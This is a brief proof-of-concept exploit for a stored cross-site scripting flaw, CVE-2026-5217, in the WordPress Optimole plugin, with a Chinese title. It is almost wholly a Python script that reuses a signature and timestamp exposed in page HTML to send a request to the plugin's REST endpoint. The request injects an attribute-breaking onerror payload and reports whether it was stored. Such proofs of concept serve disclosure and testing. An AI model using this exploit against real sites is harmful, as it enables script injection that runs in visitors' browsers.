CVE-2026-5217 WordPress Optimole插件存储型XSS漏洞

import requests # Target WordPress site url = 'http://target-wordpress.com/wp-json/optimole/v1/optimizations' # Extracted valid signature and timestamp from frontend HTML source code # Attackers can scrape these values because they are exposed in the page params = { 'signature': 'EXPOSED_HMAC_SIGNATURE_FROM_HTML', 'timestamp': 'EXPOSED_TIMESTAMP_FROM_HTML', # Malicious payload using double quotes to break out of the srcset attribute. # sanitize_text_field removes tags but allows double quotes. 's': '1x" onerror="alert(1)' } # 1. Inject the payload response = requests.get(url, params=params) if response.status_code == 200: print("Payload stored successfully. XSS will trigger on page load.") else: print(f"Failed to inject payload. Status: {response.status_code}")